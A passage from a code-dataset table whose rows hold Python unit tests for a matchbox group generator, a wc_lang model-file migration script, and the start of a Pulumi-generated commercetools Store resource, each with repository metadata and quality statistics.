hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bd9449cc49c39e59a09de086c44e3ff46fef6bd2 | 11,491 | py | Python | app/tests/unit/test_generate_groups.py | JulienBalestra/enjoliver | 13b41d0c40a56ea212a88d3e4f3aee91a318f3f0 | [
"MIT"
] | 33 | 2017-01-20T11:58:32.000Z | 2021-08-21T16:33:18.000Z | app/tests/unit/test_generate_groups.py | JulienBalestra/enjoliver | 13b41d0c40a56ea212a88d3e4f3aee91a318f3f0 | [
"MIT"
] | 8 | 2017-04-20T14:17:37.000Z | 2017-12-22T11:25:24.000Z | app/tests/unit/test_generate_groups.py | JulienBalestra/enjoliver | 13b41d0c40a56ea212a88d3e4f3aee91a318f3f0 | [
"MIT"
] | 5 | 2017-04-19T14:36:12.000Z | 2017-10-10T11:09:16.000Z | import os
from unittest import TestCase
import time
from app import generator
class TestGenerateGroups(TestCase):
gen = generator.GenerateGroup
unit_path = "%s" % os.path.dirname(__file__)
tests_path = "%s" % os.path.split(unit_path)[0]
test_matchbox_path = "%s/test_matchbox" % tests_path
api_uri = "http://127.0.0.1:5000"
@classmethod
def setUpClass(cls):
cls.gen = generator.GenerateGroup(
api_uri=cls.api_uri,
_id="etcd-proxy",
name="etcd-proxy",
profile="TestGenerateProfiles",
matchbox_path=cls.test_matchbox_path
)
cls.gen.profiles_path = "%s/test_resources" % cls.tests_path
def test_00_uri(self):
ip = self.gen.api_uri
self.assertIsNotNone(ip)
def test_01_metadata(self):
expect = {'etcd_initial_cluster': '',
'api_uri': '%s' % self.gen.api_uri,
'ssh_authorized_keys': []}
self.gen._metadata()
self.assertEqual(expect['api_uri'], self.gen._target_data["metadata"]["api_uri"])
def test_990_generate(self):
expect = {
'profile': 'etcd-proxy.yaml',
'metadata': {
'api_uri': '%s' % self.gen.api_uri,
'ssh_authorized_keys': []
},
'id': 'etcd-proxy',
'name': 'etcd-proxy'
}
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id="etcd-proxy",
name="etcd-proxy",
profile="etcd-proxy.yaml",
matchbox_path=self.test_matchbox_path
)
result = new.generate()
self.assertEqual(expect["profile"], result["profile"])
self.assertEqual(expect["id"], result["id"])
self.assertEqual(expect["name"], result["name"])
self.assertEqual(expect["metadata"]["api_uri"], result["metadata"]["api_uri"])
def test_991_dump(self):
_id = "etcd-test-%s" % self.test_991_dump.__name__
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id=_id,
name="etcd-test",
profile="etcd-test.yaml",
matchbox_path=self.test_matchbox_path
)
self.assertTrue(new.dump())
self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
self.assertFalse(new.dump())
self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id=_id,
name="etcd-test",
profile="etcd-test.yaml",
matchbox_path=self.test_matchbox_path,
selector={"one": "selector"}
)
self.assertTrue(new.dump())
self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))
class TestGenerateGroupsSelectorLower(TestCase):
gen = generator.GenerateGroup
unit_path = "%s" % os.path.dirname(__file__)
tests_path = "%s" % os.path.split(unit_path)[0]
test_matchbox_path = "%s/test_matchbox" % tests_path
api_uri = "http://127.0.0.1:5000"
@classmethod
def setUpClass(cls):
os.environ["MATCHBOX_URI"] = "http://127.0.0.1:8080"
os.environ["API_URI"] = "http://127.0.0.1:5000"
cls.gen = generator.GenerateGroup(
api_uri=cls.api_uri,
_id="etcd-proxy",
name="etcd-proxy",
profile="TestGenerateProfiles",
selector={"mac": "08:00:27:37:28:2e"},
matchbox_path=cls.test_matchbox_path
)
@classmethod
def tearDownClass(cls):
pass
def test_00_api_uri(self):
ip = self.gen.api_uri
self.assertIsNotNone(ip)
def test_01_metadata(self):
expect = {
'api_uri': "%s" % self.gen.api_uri,
'ssh_authorized_keys': []
}
self.gen._metadata()
self.gen._target_data["metadata"]['ssh_authorized_keys'] = []
self.assertEqual(expect, self.gen._target_data["metadata"])
def test_02_selector(self):
expect = {'mac': '08:00:27:37:28:2e'}
self.gen._selector()
self.assertEqual(expect, self.gen._target_data["selector"])
def test_990_generate(self):
expect = {
'profile': 'etcd-proxy.yaml',
'metadata': {
'api_uri': self.gen.api_uri,
'selector': {'mac': '08:00:27:37:28:2e'},
'ssh_authorized_keys': []
},
'id': 'etcd-proxy',
'name': 'etcd-proxy',
'selector': {'mac': '08:00:27:37:28:2e'}
}
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id="etcd-proxy", name="etcd-proxy", profile="etcd-proxy.yaml",
selector={"mac": "08:00:27:37:28:2e"},
matchbox_path=self.test_matchbox_path)
result = new.generate()
result["metadata"]['ssh_authorized_keys'] = []
self.assertEqual(expect, result)
def test_991_dump(self):
_id = "etcd-test-%s" % self.test_991_dump.__name__
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id="%s" % _id, name="etcd-test", profile="etcd-test.yaml",
matchbox_path=self.test_matchbox_path,
selector={"mac": "08:00:27:37:28:2e"}
)
self.assertTrue(new.dump())
self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))
class TestGenerateGroupsSelectorUpper(TestCase):
gen = generator.GenerateGroup
unit_path = "%s" % os.path.dirname(__file__)
tests_path = "%s" % os.path.split(unit_path)[0]
test_matchbox_path = "%s/test_matchbox" % tests_path
api_uri = "http://127.0.0.1:5000"
@classmethod
def setUpClass(cls):
os.environ["MATCHBOX_URI"] = "http://127.0.0.1:8080"
os.environ["API_URI"] = "http://127.0.0.1:5000"
cls.gen = generator.GenerateGroup(
api_uri=cls.api_uri,
_id="etcd-proxy",
name="etcd-proxy",
profile="TestGenerateProfiles",
selector={"mac": "08:00:27:37:28:2E"},
matchbox_path=cls.test_matchbox_path
)
def test_00_ip_address(self):
ip = self.gen.api_uri
self.assertIsNotNone(ip)
def test_01_metadata(self):
expect = {
'api_uri': "%s" % self.gen.api_uri,
'ssh_authorized_keys': []
}
self.gen._metadata()
self.gen._target_data["metadata"]['ssh_authorized_keys'] = []
self.assertEqual(expect, self.gen._target_data["metadata"])
def test_02_selector(self):
expect = {'mac': '08:00:27:37:28:2e'}
self.gen._selector()
self.assertEqual(expect, self.gen._target_data["selector"])
def test_990_generate(self):
expect = {
'profile': 'etcd-proxy.yaml',
'metadata': {
'api_uri': "%s" % self.gen.api_uri,
'selector': {'mac': '08:00:27:37:28:2e'},
'ssh_authorized_keys': []
},
'id': 'etcd-proxy',
'name': 'etcd-proxy',
'selector': {'mac': '08:00:27:37:28:2e'}
}
new = generator.GenerateGroup(
api_uri=self.api_uri, _id="etcd-proxy",
name="etcd-proxy",
profile="etcd-proxy.yaml",
selector={"mac": "08:00:27:37:28:2e"},
matchbox_path=self.test_matchbox_path
)
result = new.generate()
result["metadata"]['ssh_authorized_keys'] = []
self.assertEqual(expect, result)
def test_991_dump(self):
_id = "etcd-test-%s" % self.test_991_dump.__name__
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id="%s" % _id, name="etcd-test", profile="etcd-test.yaml",
matchbox_path=self.test_matchbox_path,
selector={"mac": "08:00:27:37:28:2e"}
)
new.dump()
self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))
class TestGenerateGroupsExtraMetadata(TestCase):
gen = generator.GenerateGroup
unit_path = "%s" % os.path.dirname(__file__)
tests_path = "%s" % os.path.split(unit_path)[0]
test_matchbox_path = "%s/test_matchbox" % tests_path
api_uri = "http://127.0.0.1:5000"
@classmethod
def setUpClass(cls):
os.environ["MATCHBOX_URI"] = "http://127.0.0.1:8080"
os.environ["API_URI"] = "http://127.0.0.1:5000"
cls.gen = generator.GenerateGroup(
api_uri=cls.api_uri,
_id="etcd-proxy",
name="etcd-proxy",
profile="TestGenerateProfiles",
selector={"mac": "08:00:27:37:28:2E"},
metadata={"etcd_initial_cluster": "static0=http://192.168.1.1:2379",
"api_seed": "http://192.168.1.2:5000"},
matchbox_path=cls.test_matchbox_path
)
def test_00_api_uri(self):
ip = self.gen.api_uri
self.assertIsNotNone(ip)
def test_01_metadata(self):
expect = {'etcd_initial_cluster': 'static0=http://192.168.1.1:2379',
'api_uri': "%s" % self.gen.api_uri,
'api_seed': 'http://192.168.1.2:5000',
'ssh_authorized_keys': []}
self.gen._metadata()
self.gen._target_data["metadata"]['ssh_authorized_keys'] = []
self.assertEqual(expect, self.gen._target_data["metadata"])
def test_02_selector(self):
expect = {'mac': '08:00:27:37:28:2e'}
self.gen._selector()
self.assertEqual(expect, self.gen._target_data["selector"])
def test_990_generate(self):
expect = {
'profile': 'etcd-proxy.yaml',
'metadata': {
'api_uri': "%s" % self.gen.api_uri,
'selector': {'mac': '08:00:27:37:28:2e'},
'ssh_authorized_keys': []
},
'id': 'etcd-proxy',
'name': 'etcd-proxy',
'selector': {'mac': '08:00:27:37:28:2e'}
}
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id="etcd-proxy", name="etcd-proxy", profile="etcd-proxy.yaml",
selector={"mac": "08:00:27:37:28:2e"},
matchbox_path=self.test_matchbox_path
)
result = new.generate()
result["metadata"]["ssh_authorized_keys"] = []
self.assertEqual(expect, result)
def test_991_dump(self):
_id = "etcd-test-%s" % self.test_991_dump.__name__
new = generator.GenerateGroup(
api_uri=self.api_uri,
_id="%s" % _id, name="etcd-test", profile="etcd-test.yaml",
matchbox_path=self.test_matchbox_path,
selector={"mac": "08:00:27:37:28:2e"}
)
self.assertTrue(new.dump())
self.assertTrue(os.path.isfile("%s/groups/%s.json" % (self.test_matchbox_path, _id)))
os.remove("%s/groups/%s.json" % (self.test_matchbox_path, _id))
self.assertTrue(new.dump())
for i in range(10):
self.assertFalse(new.dump())
new.api_uri = "http://google.com"
self.assertTrue(new.dump())
self.assertFalse(new.dump())
| 36.021944 | 93 | 0.566356 | 1,394 | 11,491 | 4.434003 | 0.070301 | 0.058243 | 0.069892 | 0.061479 | 0.90762 | 0.896295 | 0.89128 | 0.888529 | 0.881573 | 0.863291 | 0 | 0.049573 | 0.276738 | 11,491 | 318 | 94 | 36.13522 | 0.69414 | 0 | 0 | 0.807829 | 1 | 0 | 0.205117 | 0 | 0 | 0 | 0 | 0 | 0.117438 | 1 | 0.085409 | false | 0.003559 | 0.014235 | 0 | 0.185053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e52d89be005eafea537b32cd612b4e88736703c4 | 10,193 | py | Python | migrations/run_custom_migration.py | KarrLab/wc_lang | 113a8b473576fa9c13688d2deb71b4b2ab400a03 | [
"MIT"
] | 7 | 2018-05-14T09:26:14.000Z | 2021-05-20T01:11:45.000Z | migrations/run_custom_migration.py | KarrLab/wc_lang | 113a8b473576fa9c13688d2deb71b4b2ab400a03 | [
"MIT"
] | 142 | 2018-03-14T16:50:56.000Z | 2021-01-03T16:25:23.000Z | migrations/run_custom_migration.py | KarrLab/wc_lang | 113a8b473576fa9c13688d2deb71b4b2ab400a03 | [
"MIT"
] | 4 | 2019-01-06T08:32:23.000Z | 2021-05-20T01:11:49.000Z | import migration_2020_04_27 as migration
""" Migration WC-lang-encoded files
:Author: Jonathan Karr <karr@mssm.edu>
:Date: 2020-04-27
:Copyright: 2020, Karr Lab
:License: MIT
"""
import copy
import os.path
import sys
import warnings
import wc_lang.io
sys.path.insert(0, 'migrations')
base_dir = os.path.expanduser('~/Documents')
paths = [
# wc_lang
{'path': 'wc_lang/tests/fixtures/example-model.xlsx'},
{'path': 'wc_lang/tests/fixtures/sbml-io.xlsx'},
{'path': 'wc_lang/tests/fixtures/sbml-io-transformed.xlsx'},
{'path': 'wc_lang/tests/fixtures/test_model.xlsx'},
{'path': 'wc_lang/tests/fixtures/test_validate_model.xlsx'},
{'path': 'wc_lang/tests/sbml/fixtures/static-model.xlsx'},
# wc_sim
{'path': 'wc_sim/examples/transcription_translation_hybrid_model/model.xlsx'},
{'path': 'wc_sim/examples/translation_metabolism_hybrid_model/model.xlsx'},
{'path': 'wc_sim/tests/fixtures/2_species_1_reaction.xlsx'},
{'path': 'wc_sim/tests/fixtures/2_species_1_reaction_with_rates_given_by_reactant_population.xlsx'},
{'path': 'wc_sim/tests/fixtures/2_species_a_pair_of_symmetrical_reactions_rates_given_by_reactant_population.xlsx'},
{'path': 'wc_sim/tests/fixtures/MetabolismAndGeneExpression.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_dry_model.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_dry_model_with_mass_computation.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/test_dynamic_expressions.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_model.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/test_model_for_access_species_populations.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_model_for_access_species_populations_steady_state.xlsx'},
{'path': 'wc_sim/tests/fixtures/test_new_features_model.xlsx'},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/one_exchange_rxn_compt_growth.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/stop_conditions.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/one_reaction_linear.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/template.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/one_rxn_exponential.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/fixtures/dynamic_tests/static.xlsx',
'ignore_extra_models': True},
{'path': 'wc_sim/tests/submodels/fixtures/test_next_reaction_method_submodel.xlsx'},
{'path': 'wc_sim/tests/submodels/fixtures/test_next_reaction_method_submodel_2.xlsx'},
{'path': 'wc_sim/tests/submodels/fixtures/test_submodel.xlsx'},
{'path': 'wc_sim/tests/submodels/fixtures/test_submodel_no_shared_species.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00003/00003-wc_lang_1_submodel.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00003/00003-wc_lang_2_submodels.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00003/00003-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00007/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00020/00020-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00021/00021-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00030/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/multialgorithmic/00030/00030-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00002/00002-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00003/00003-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00004/00004-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00005/00005-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00006/00006-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00010/00010-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00014/00014-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00015/00015-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00017/00017-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00018/00018-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00019/00019-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00020/00020-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00021/00021-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00022/00022-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00028/00028-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/semantic/00054/00054-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00003/00003-wc_lang_1_submodel.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00003/00003-wc_lang_2_submodels.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00003/00003-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00004/00004-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00007/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00007_hybrid/00007_hybrid-wc_lang_old.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00007_hybrid/00007_hybrid-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00012/00012-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00020/00020-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00021/00021-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00030/00030-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/00037/00037-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/cases/stochastic/transcription_translation/transcription_translation-wc_lang.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/transcription_translation/transcription_translation_correct_ssa.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/transcription_translation/transcription_translation_hybrid.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/transcription_translation/transcription_translation-wc_lang_JK.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/translation_metabolism/translation_metabolism_correct_ssa.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/hybrid/translation_metabolism/translation_metabolism_hybrid.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/multialgorithmic/00007/00007-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/semantic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/semantic/00004/00004-wc_lang.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing/semantic/00054/00054-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/stochastic/00001/00001-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing/stochastic/00006/00006-wc_lang.xlsx'},
{'path': 'wc_sim/tests/fixtures/verification/testing_ValidationSuite_run/stochastic/00001/00001-wc_lang.xlsx',
'validate': False},
{'path': 'wc_sim/tests/fixtures/verification/testing_ValidationSuite_run/stochastic/00006/00006-wc_lang.xlsx',
'validate': False},
# wc_test
{'path': 'wc_test/tests/fixtures/min_model.xlsx'},
# intro_to_wc_modeling
{'path': 'intro_to_wc_modeling/intro_to_wc_modeling/wc_modeling/wc_lang_tutorial/examples/example_model.xlsx'},
# wc_analysis
{'path': 'wc_analysis/tests/fixtures/test_model.xlsx'},
# mycoplasma_pneumoniae
{'path': 'mycoplasma_pneumoniae/mycoplasma_pneumoniae/model/model_calibration.xlsx'},
{'path': 'mycoplasma_pneumoniae/mycoplasma_pneumoniae/model/model_calibration_wDeg.xlsx'},
# h1_hesc
{'path': 'h1_hesc/tests/model/cell_cycle/fixtures/test_exponential_growth_in_M.xlsx'},
{'path': 'h1_hesc/tests/model/cell_cycle/fixtures/test_cyclin_dynamics.xlsx'},
{'path': 'h1_hesc/model/hesc_recon/hesc_recon_wc_data_model.xlsx'},
{'path': 'h1_hesc/tests/code/fixtures/eukaryote_model.xlsx'},
{'path': 'h1_hesc/tests/code/fixtures/mock_model.xlsx'},
# rand_wc_model_gen
{'path': 'rand_wc_model_gen/rand_wc_model_gen/model_gen/model.xlsx'},
{'path': 'rand_wc_model_gen/rand_wc_model_gen/model_gen/model_2.xlsx'},
]
paths = [
{'path': 'wc_sim/tests/submodels/fixtures/test_next_reaction_method_submodel_2.xlsx'},
]
for i_path, path in enumerate(paths):
print('Migrating path {} of {}: {}'.format(i_path + 1, len(paths), path['path']))
abs_path = os.path.join(base_dir, path['path'])
# migrate
migration.transform(abs_path)
# validate
if path.get('validate', True):
kwargs = copy.copy(path)
kwargs.pop('path')
if 'validate' in kwargs:
kwargs.pop('validate')
try:
wc_lang.io.Reader().run(abs_path, **kwargs)
except ValueError as err:
warnings.warn('{} is invalid: {}'.format(path['path'], str(err)))
| 59.608187 | 134 | 0.745021 | 1,372 | 10,193 | 5.276239 | 0.131195 | 0.070452 | 0.095731 | 0.145048 | 0.808813 | 0.799696 | 0.783396 | 0.761846 | 0.71322 | 0.664456 | 0 | 0.055165 | 0.093005 | 10,193 | 170 | 135 | 59.958824 | 0.727853 | 0.011773 | 0 | 0.15942 | 0 | 0 | 0.764611 | 0.692362 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.043478 | 0.007246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e5686505a7f367f1c159af3103ba63e2335a996e | 16,326 | py | Python | sdk/python/pulumi_commercetools/store.py | unplatform-io/pulumi-commercetools | b81b998f99995c2ab7eb05a45220d414ae414da3 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-03-05T10:13:36.000Z | 2021-03-05T10:13:36.000Z | sdk/python/pulumi_commercetools/store.py | unplatform-io/pulumi-commercetools | b81b998f99995c2ab7eb05a45220d414ae414da3 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-09-17T07:23:39.000Z | 2021-09-20T12:34:51.000Z | sdk/python/pulumi_commercetools/store.py | unplatform-io/pulumi-commercetools | b81b998f99995c2ab7eb05a45220d414ae414da3 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['StoreArgs', 'Store']
@pulumi.input_type
class StoreArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Store resource.
:param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
:param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
:param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
:param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
:param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
"""
pulumi.set(__self__, "key", key)
if distribution_channels is not None:
pulumi.set(__self__, "distribution_channels", distribution_channels)
if languages is not None:
pulumi.set(__self__, "languages", languages)
if name is not None:
pulumi.set(__self__, "name", name)
if supply_channels is not None:
pulumi.set(__self__, "supply_channels", supply_channels)
